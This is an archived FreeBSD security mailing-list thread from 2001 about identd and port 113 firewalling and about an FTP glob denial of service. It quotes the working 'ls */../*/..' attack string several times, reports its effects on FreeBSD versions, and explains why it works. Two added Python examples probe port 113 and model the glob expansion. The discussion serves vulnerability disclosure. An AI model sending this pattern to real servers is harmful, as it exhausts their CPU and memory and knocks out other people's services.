----- Original Message -----
From: "Jason Terlecki" <JTERLECKI@team.look.ca>
To: "Ronan Lucio" <ronan@melim.com.br>; <security@FreeBSD.ORG>
Sent: Thursday, March 15, 2001 3:39 PM
Subject: RE: Port 113


No,

this port is used by identd.  Many IRC servers require you to be able to
respond on that port when you connect to it.
It allows daemons to determine the username of a connecting client.

Jason Terlecki
System Analyst - Internet
Look Communication - Montreal

-----Original Message-----
From: Ronan Lucio [mailto:ronan@melim.com.br]
Sent: March 15, 2001 1:19 PM
To: security@FreeBSD.ORG
Subject: Port 113


Hi all,

Could anybody tell me when I need to allow port 113
in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server.
Does this port need to allow connections for the DNS service to work?

Thanks

Ronan Lucio







From owner-freebsd-security  Thu Mar 15 14:09:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
	by hub.freebsd.org (Postfix) with ESMTP id 6AAB837B71A
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:09:23 -0800 (PST)
	(envelope-from des@ofug.org)
Received: (from des@localhost)
	by flood.ping.uio.no (8.9.3/8.9.3) id XAA62363;
	Thu, 15 Mar 2001 23:09:17 +0100 (CET)
	(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
  coincide with those of any organisation or company with
  which I am or have been affiliated.
To: nate@yogotech.com (Nate Williams)
Cc: Adam Laurie <adam@algroup.co.uk>,
	Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 15 Mar 2001 23:09:16 +0100
In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 13:36:16 -0700 (MST)"
Message-ID: <xzpbsr2ptv7.fsf@flood.ping.uio.no>
Lines: 13
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams <nate@yogotech.com> writes:
> My local sendmail doesn't use *my* ident server, but remote sendmail
> servers use *my* ident server, so using ident locally speeds up mail
> transfers *to* my host.

No, the problem only arises if you drop TCP 113 SYNs to the floor
instead of rejecting them (ipfw deny instead of ipfw reset); the
server times out waiting for you to reply. If you send an RST or an
ICMP UNREACH back, it'll give up immediately.

DES
-- 
Dag-Erling Smorgrav - des@ofug.org



From owner-freebsd-security  Thu Mar 15 14:12:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
	by hub.freebsd.org (Postfix) with ESMTP id 29BD837B719
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:12:32 -0800 (PST)
	(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
	by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id PAA13545;
	Thu, 15 Mar 2001 15:11:50 -0700 (MST)
	(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
	by nomad.yogotech.com (8.8.8/8.8.8) id PAA07956;
	Thu, 15 Mar 2001 15:11:49 -0700 (MST)
	(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.15908.270320.373266@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 15:11:48 -0700 (MST)
To: Dag-Erling Smorgrav <des@ofug.org>
Cc: nate@yogotech.com (Nate Williams),
	Adam Laurie <adam@algroup.co.uk>, Ronan Lucio <ronan@melim.com.br>,
	security@FreeBSD.ORG
Subject: Re: Port 113
In-Reply-To: <xzpbsr2ptv7.fsf@flood.ping.uio.no>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
	<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
	<15025.5630.472269.543769@nomad.yogotech.com>
	<3AB1261F.23B8BE75@algroup.co.uk>
	<15025.10176.676792.32675@nomad.yogotech.com>
	<xzpbsr2ptv7.fsf@flood.ping.uio.no>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > My local sendmail doesn't use *my* ident server, but remote sendmail
> > servers use *my* ident server, so using ident locally speeds up mail
> > transfers *to* my host.
> 
> No, the problem only arises if you drop TCP 113 SYNs to the floor
> instead of rejecting them (ipfw deny instead of ipfw reset); the
> server times out waiting for you to reply. If you send an RST or an
> ICMP UNREACH back, it'll give up immediately.

Hmm, I remember a long time ago where it was said (urban legend) that
even sending RSTs confused older versions of mail servers.

Running the 'fake' ident server hasn't caused any problems AFAIK. :) :)




Nate



From owner-freebsd-security  Thu Mar 15 14:16:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
	by hub.freebsd.org (Postfix) with ESMTP id 57B4237B719
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:16:31 -0800 (PST)
	(envelope-from des@ofug.org)
Received: (from des@localhost)
	by flood.ping.uio.no (8.9.3/8.9.3) id XAA62454;
	Thu, 15 Mar 2001 23:16:26 +0100 (CET)
	(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
  coincide with those of any organisation or company with
  which I am or have been affiliated.
To: nate@yogotech.com (Nate Williams)
Cc: Adam Laurie <adam@algroup.co.uk>,
	Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> <xzpbsr2ptv7.fsf@flood.ping.uio.no> <15025.15908.270320.373266@nomad.yogotech.com>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 15 Mar 2001 23:16:25 +0100
In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 15:11:48 -0700 (MST)"
Message-ID: <xzp3dceptja.fsf@flood.ping.uio.no>
Lines: 11
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams <nate@yogotech.com> writes:
> Hmm, I remember a long time ago where it was said (urban legend) that
> even sending RSTs confused older versions of mail servers.

Huh? Sending an RST results in connect() returning ECONNREFUSED, just
like it would if there were no firewall and no identd. Any mail server
that can't handle ECONNREFUSED is broken beyond belief.

DES
-- 
Dag-Erling Smorgrav - des@ofug.org
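A check for the deny-versus-reset distinction DES describes, added here as an example that is not part of the thread: it times a TCP connect to port 113 and reports whether the host answered with an RST or ICMP unreachable (connect() fails with ECONNREFUSED at once, the "ipfw reset" case) or silently dropped the SYN (connect() waits out the timeout, the "ipfw deny" case that stalls a remote MTA's ident lookup). The function names are this example's own; the "dropped" outcome needs a real filtered host, so the offline run only exercises the refused case against a closed loopback port.

```python
import errno
import socket
import time

IDENT_PORT = 113

# Outcomes of a connect() attempt, in the terms the thread uses:
#   "refused": RST or ICMP unreachable came back -> the MTA gives up at once
#   "dropped": nothing came back (SYN silently discarded) -> the MTA waits
#              for its full ident timeout before delivering the mail
#   "open":    something answered on the port (identd, or a fake identd)


def probe_ident(host, port=IDENT_PORT, timeout=5.0):
    """Return (outcome, seconds_elapsed) for one TCP connect to host:port."""
    start = time.monotonic()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open", time.monotonic() - start
    except socket.timeout:
        # No RST and no ICMP error within the timeout: the SYN was dropped.
        return "dropped", time.monotonic() - start
    except OSError as exc:
        # ECONNREFUSED for an RST; EHOSTUNREACH/ENETUNREACH for ICMP unreach.
        if exc.errno in (errno.ECONNREFUSED, errno.EHOSTUNREACH,
                         errno.ENETUNREACH):
            return "refused", time.monotonic() - start
        raise
    finally:
        sock.close()


def free_loopback_port():
    """Pick a loopback port nothing listens on (constructed test input,
    standing in for a host whose port 113 answers with an RST)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # A closed port on the local stack behaves like a host with no identd
    # and no firewall (or an "ipfw reset" rule): refused immediately.
    print("closed loopback port:", probe_ident("127.0.0.1", free_loopback_port()))
    # Run probe_ident("<your MTA host>") from outside your network to see
    # whether your filter on 113 rejects (good) or drops (slow) the SYN.
```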



From owner-freebsd-security  Thu Mar 15 14:50:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10])
	by hub.freebsd.org (Postfix) with ESMTP id 67C0B37B719
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:49:58 -0800 (PST)
	(envelope-from fpscha@ns1.via-net-works.net.ar)
Received: (from fpscha@localhost)
	by ns1.via-net-works.net.ar (8.9.3/8.9.3) id TAA16613;
	Thu, 15 Mar 2001 19:50:23 -0300 (ART)
From: Fernando Schapachnik <fpscha@ns1.via-net-works.net.ar>
Message-Id: <200103152250.TAA16613@ns1.via-net-works.net.ar>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
 "from Attila Nagy at Mar 15, 2001 09:21:16 pm"
To: Attila Nagy <bra@fsn.hu>
Date: Thu, 15 Mar 2001 19:50:23 -0300 (ART)
Cc: freebsd-security@FreeBSD.ORG
Reply-To: Fernando Schapachnik <fschapachnik@vianetworks.com.ar>
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=ISO-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In an earlier message, Attila Nagy wrote:
> 
> FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> -STABLE.

Sure?

With 4.2-REL:

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
150 Opening ASCII mode data connection for '/bin/ls'.
226 Transfer complete.
ftp>
ftp> ls
150 Opening ASCII mode data connection for '/bin/ls'.
total 13
-rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
-rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
-rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login

[Everything normal, I mean]


Regards.

Fernando P. Schapachnik
Network Administration
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA



From owner-freebsd-security  Thu Mar 15 14:58:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4])
	by hub.freebsd.org (Postfix) with ESMTP id 3456E37B718
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:58:37 -0800 (PST)
	(envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost)
	by gndrsh.dnsmgr.net (8.9.3/8.9.3) id OAA51686;
	Thu, 15 Mar 2001 14:58:01 -0800 (PST)
	(envelope-from freebsd)
From: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Message-Id: <200103152258.OAA51686@gndrsh.dnsmgr.net>
Subject: Re: Port 113
In-Reply-To: <15025.15908.270320.373266@nomad.yogotech.com> from Nate Williams at "Mar 15, 2001 03:11:48 pm"
To: nate@yogotech.com (Nate Williams)
Date: Thu, 15 Mar 2001 14:58:00 -0800 (PST)
Cc: des@ofug.org (Dag-Erling Smorgrav),
	adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio),
	security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > My local sendmail doesn't use *my* ident server, but remote sendmail
> > > servers use *my* ident server, so using ident locally speeds up mail
> > > transfers *to* my host.
> > 
> > No, the problem only arises if you drop TCP 113 SYNs to the floor
> > instead of rejecting them (ipfw deny instead of ipfw reset); the
> > server times out waiting for you to reply. If you send an RST or an
> > ICMP UNREACH back, it'll give up immediately.
> 
> Hmm, I remember a long time ago where it was said (urban legend) that
> even sending RSTs confused older versions of mail servers.

There have been several problems over time with ipfw reset and icmp
on FreeBSD not doing the right things.  I've seen several commits that
look like they may be addressing the problem but have not found the
time to test to see if they fixed it.

I know from first hand experience that using ipfw reset to try and
stop ident requests used to do little to nothing more than ipfw deny.

IIRC one of the problems I saw was that the icmp reset packet was
created with the address of the ipfw box, which caused it to be
ignored by the sending host.  Don't know if that ever got fixed or
not though.

> Running the 'fake' ident server hasn't caused any problems AFAIK. :) :)
> 
> 
> 
> 
> Nate
> 
> 


-- 
Rod Grimes - KD7CAX @ CN85sl - (RWG25)               rgrimes@gndrsh.dnsmgr.net



From owner-freebsd-security  Thu Mar 15 15:00:08 2001
Delivered-To: freebsd-security@freebsd.org
Received: from clone.registro.br (clone.REGISTRO.BR [143.108.23.4])
	by hub.freebsd.org (Postfix) with ESMTP id 3AC7637B718
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:00:00 -0800 (PST)
	(envelope-from fneves@registro.br)
Received: by clone.registro.br (Postfix, from userid 1000)
	id 1F2C69293; Thu, 15 Mar 2001 19:59:58 -0300 (BRT)
Date: Thu, 15 Mar 2001 19:59:58 -0300
From: Frederico A C Neves <fneves@registro.br>
To: Fernando Schapachnik <fschapachnik@vianetworks.com.ar>
Cc: Attila Nagy <bra@fsn.hu>, freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315195957.S78129@registro.br>
References: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu> <200103152250.TAA16613@ns1.via-net-works.net.ar>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Thu, Mar 15, 2001 at 07:50:23PM -0300
X-Operating-System: FreeBSD
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I think so. With 4.2-STABLE in an anonymous session we got 100% CPU
until we kill ftpd.

On Thu, Mar 15, 2001 at 07:50:23PM -0300, Fernando Schapachnik wrote:
> In an earlier message, Attila Nagy wrote:
> > 
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
> 
> Sure?
> 
> With 4.2-REL:
> 
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> 150 Opening ASCII mode data connection for '/bin/ls'.
> 226 Transfer complete.
> ftp>
> ftp> ls
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 13
> -rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
> drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
> -rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
> -rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login
> 
> [Everything normal, I mean]
> 
> 
> Regards.
> 
> Fernando P. Schapachnik
> Network Administration
> VIA NET.WORKS ARGENTINA S.A.
> fschapachnik@vianetworks.com.ar
> Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA
> 
> 

-- 
 Frederico A C Neves              Registro .br - R.Pio XI, 1500
 +55 11 3838-4130             São Paulo, SP, Brazil - 05468-901



From owner-freebsd-security  Thu Mar 15 15:14:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1])
	by hub.freebsd.org (Postfix) with ESMTP id EFD5B37B719
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:14:55 -0800 (PST)
	(envelope-from mike@sentex.net)
Received: from chimp (fcage [192.168.0.2])
	by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2FNEsg62264
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 18:14:54 -0500 (EST)
	(envelope-from mike@sentex.net)
Message-Id: <4.2.2.20010315181354.02a035d0@marble.sentex.net>
X-Sender: mdtancsa@marble.sentex.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 
Date: Thu, 15 Mar 2001 18:14:53 -0500
To: freebsd-security@FreeBSD.ORG
From: Mike Tancsa <mike@sentex.net>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>
References: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


4.1 from Aug 10th is hurt by it.

         ---Mike

At 07:50 PM 3/15/2001 -0300, Fernando Schapachnik wrote:
>In an earlier message, Attila Nagy wrote:
> >
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
>
>Sure?
>
>With 4.2-REL:
>
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>150 Opening ASCII mode data connection for '/bin/ls'.
>226 Transfer complete.
>ftp>
>ftp> ls
>150 Opening ASCII mode data connection for '/bin/ls'.
>total 13
>-rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
>drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
>-rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
>-rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login
>
>[Everything normal, I mean]
>
>
>Regards.
>
>Fernando P. Schapachnik
>Network Administration
>VIA NET.WORKS ARGENTINA S.A.
>fschapachnik@vianetworks.com.ar
>Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA
>

--------------------------------------------------------------------
Mike Tancsa,                          	          tel +1 519 651 3400
Network Administration,     			  mike@sentex.net
Sentex Communications                 		  www.sentex.net
Cambridge, Ontario Canada			  www.sentex.net/mike




From owner-freebsd-security  Thu Mar 15 15:15:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
	by hub.freebsd.org (Postfix) with ESMTP id 551A037B718
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:15:27 -0800 (PST)
	(envelope-from des@ofug.org)
Received: (from des@localhost)
	by flood.ping.uio.no (8.9.3/8.9.3) id AAA62716;
	Fri, 16 Mar 2001 00:15:14 +0100 (CET)
	(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
  coincide with those of any organisation or company with
  which I am or have been affiliated.
To: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Cc: nate@yogotech.com (Nate Williams),
	adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio),
	security@FreeBSD.ORG
Subject: Re: Port 113
References: <200103152258.OAA51686@gndrsh.dnsmgr.net>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 16 Mar 2001 00:15:13 +0100
In-Reply-To: "Rodney W. Grimes"'s message of "Thu, 15 Mar 2001 14:58:00 -0800 (PST)"
Message-ID: <xzpu24uoc8u.fsf@flood.ping.uio.no>
Lines: 12
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net> writes:
> IIRC one of the problems I saw was that the icmp reset packet was
> created with the address of the ipfw box, which caused it to be
> ignored by the sending host.  Don't know if that ever got fixed or
> not though.

Uh, you're probably right. I mostly run ipfw on the leaf host, so I
wouldn't get hit by that bug.

DES
-- 
Dag-Erling Smorgrav - des@ofug.org



From owner-freebsd-security  Thu Mar 15 15:17:06 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www3.infolink.com.br (www3.infolink.com.br [200.255.108.4])
	by hub.freebsd.org (Postfix) with ESMTP id 68E5B37B719
	for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 15:17:02 -0800 (PST)
	(envelope-from apina@infolink.com.br)
Received: from infolink.com.br (unverified [200.255.108.32]) by www3.infolink.com.br
 (Vircom SMTPRS 4.2.181) with SMTP id <B0024487301@www3.infolink.com.br> for <freebsd-security@freebsd.org>;
 Thu, 15 Mar 2001 20:16:59 -0300
From: "Antonio Carlos Pina" <apina@infolink.com.br>
Reply-To: apina@infolink.com.br
To: freebsd-security@freebsd.org
Date: Thu, 15 Mar 2001 20:17:00 est
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-id: <3ab14d6c.31f.0@infolink.com.br>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,

Actually I think this highly depends on HOW MANY files and 
directories FTPD can access.

I didn't see any damage with a jailed FTPD with 1 directory and 2
files.

Best Regards,

>I think so. With 4.2-STABLE in an anonymous session we got 100% CPU
>until we kill ftpd.
>
>> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
>> > -STABLE.
>> 
>> Sure?
>> 
>> With 4.2-REL:
>> 
>> Remote system type is UNIX.
>> Using binary mode to transfer files.
>> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>> 150 Opening ASCII mode data connection for '/bin/ls'.
>> 226 Transfer complete.
>> ftp>
>> ftp> ls
>> 150 Opening ASCII mode data connection for '/bin/ls'.
>> total 13
>> -rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
>> drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
>> -rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
>> -rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login
>> 
>> [Everything normal, I mean]
>> 
>> 
>> Regards.
>> 
>> Fernando P. Schapachnik
>> Network Administration
>> VIA NET.WORKS ARGENTINA S.A.
>> fschapachnik@vianetworks.com.ar
>> Switchboard: (54-11) 4323-3333 - Support: 0810-333-AYUDA
>> 
>> 
>
>-- 
> Frederico A C Neves              Registro .br - R.Pio XI, 1500
> +55 11 3838-4130             São Paulo, SP, Brazil - 05468-901
>
>

Regards,
Antonio Carlos Pina
apina@infolink.com.br
Technology Director (CTO)
http://www.infolink.com.br




From owner-freebsd-security  Thu Mar 15 15:44:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tahoe.cinenet.net (ns1.cinenet.net [198.147.76.65])
	by hub.freebsd.org (Postfix) with ESMTP id D16C837B718
	for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 15:44:15 -0800 (PST)
	(envelope-from mikey@singingtree.com)
Received: from ember (pool.207.151.148.219.cinenet.net [207.151.148.219])
	by tahoe.cinenet.net (8.9.3/8.9.3) with SMTP id PAA08072
	for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 15:44:14 -0800 (PST)
Message-ID: <004b01c0ada9$99f7b540$db9497cf@singingtree.com>
From: "Michael A. Dickerson" <mikey@singingtree.com>
To: <freebsd-security@freebsd.org>
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Date: Thu, 15 Mar 2001 15:42:29 -0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> 4.1 from Aug 10th is hurt by it.
>
>          ---Mike
>

So is 4.3-beta (otherwise known as 4-stable) from March 8.  ftpd uses 100%
cpu and memory use grows until the kernel runs out of swap space and starts
killing processes.  This was an ftp connection with a regular username and
password, in an average home directory.

M.D.







From owner-freebsd-security  Thu Mar 15 15:52:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20])
	by hub.freebsd.org (Postfix) with ESMTP id 7CC1D37B718
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:52:36 -0800 (PST)
	(envelope-from bright@fw.wintelcom.net)
Received: (from bright@localhost)
	by fw.wintelcom.net (8.10.0/8.10.0) id f2FNqYY22370;
	Thu, 15 Mar 2001 15:52:34 -0800 (PST)
Date: Thu, 15 Mar 2001 15:52:34 -0800
From: Alfred Perlstein <bright@wintelcom.net>
To: Antonio Carlos Pina <apina@infolink.com.br>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315155234.G29888@fw.wintelcom.net>
References: <3ab14d6c.31f.0@infolink.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3ab14d6c.31f.0@infolink.com.br>; from apina@infolink.com.br on Thu, Mar 15, 2001 at 08:17:00PM -0500
X-all-your-base: are belong to us.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

* Antonio Carlos Pina <apina@infolink.com.br> [010315 15:17] wrote:
> Hello,
> 
> Actually I think this highly depends on HOW MANY files and 
> directories FTPD can access.
> 
> I didn't see any damage with a jailed FTPD with 1 directory and 2
> files.

The only reason you didn't see a problem was because you had
only one directory.

The DoS works via a simple mechanism.

if you have a dir with two directories in it 'a' and 'b'

*/../ -> a/.. b/..
*/../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/..

basically for each ../*/ you do a power N where N is the number
of directories.

How could this be fixed?  I think it's somewhat simple, 
have glob() maintain a truncated version of paths and
make sure that any collisions are detected.

Of course this is only speculation since I haven't looked
at the code.

-- 
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
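The expansion Alfred describes, and the collision-detection fix he sketches, modelled in a small Python glob expander over a constructed in-memory directory tree (an added example, not code from the thread, FreeBSD libc or ftpd; the tree, the `expand`/`growth`/`canonical_results` names and the use of `posixpath.normpath` as the "truncated path" are assumptions of this example). Without collision detection each `*/..` pair multiplies the result count by the number of directories; with it the count stays flat:

```python
import fnmatch
import posixpath

# Constructed in-memory directory tree (an assumption for this example):
# key = canonical directory path, value = the names it contains.
# The root holds three directories, so N = 3 below.
TREE = {
    "/": ["a", "b", "c"],
    "/a": ["f"],   # "f" is a plain file: it has no entry of its own
    "/b": [],
    "/c": [],
}


def expand(pattern, tree=TREE, dedup=False):
    """Expand a glob pattern segment by segment over `tree`.

    dedup=False keeps every partial result as its own string, which is what
    makes '*/..' repeated k times yield N**k results.  dedup=True canonicalises
    each partial result and drops collisions, the approach Alfred sketches
    (keep a normalised copy of every path and detect duplicates).
    """
    segments = [s for s in pattern.split("/") if s]
    paths = ["/"]
    for seg in segments:
        next_paths = []
        seen = set()
        for p in paths:
            cwd = posixpath.normpath(p)          # directory we expand inside
            if seg == "..":
                # '..' only exists inside a directory, never inside a file
                candidates = [posixpath.join(p, "..")] if cwd in tree else []
            elif any(ch in seg for ch in "*?["):
                candidates = [posixpath.join(p, name)
                              for name in tree.get(cwd, [])
                              if fnmatch.fnmatchcase(name, seg)]
            else:
                candidates = ([posixpath.join(p, seg)]
                              if seg in tree.get(cwd, []) else [])
            for cand in candidates:
                if dedup:
                    key = posixpath.normpath(cand)
                    if key in seen:
                        continue                 # collision: already produced
                    seen.add(key)
                next_paths.append(cand)
        paths = next_paths
    return paths


def growth(k, dedup=False, tree=TREE):
    """Result count for '*/..' repeated k times followed by '*'."""
    pattern = "/".join(["*/.."] * k + ["*"])
    return len(expand(pattern, tree, dedup))


def canonical_results(pattern, dedup=False, tree=TREE):
    """Sorted, normalised set of paths a pattern resolves to."""
    return sorted({posixpath.normpath(p) for p in expand(pattern, tree, dedup)})


if __name__ == "__main__":
    for k in range(1, 5):
        print(f"k={k}: naive={growth(k)} with-dedup={growth(k, dedup=True)}")
```

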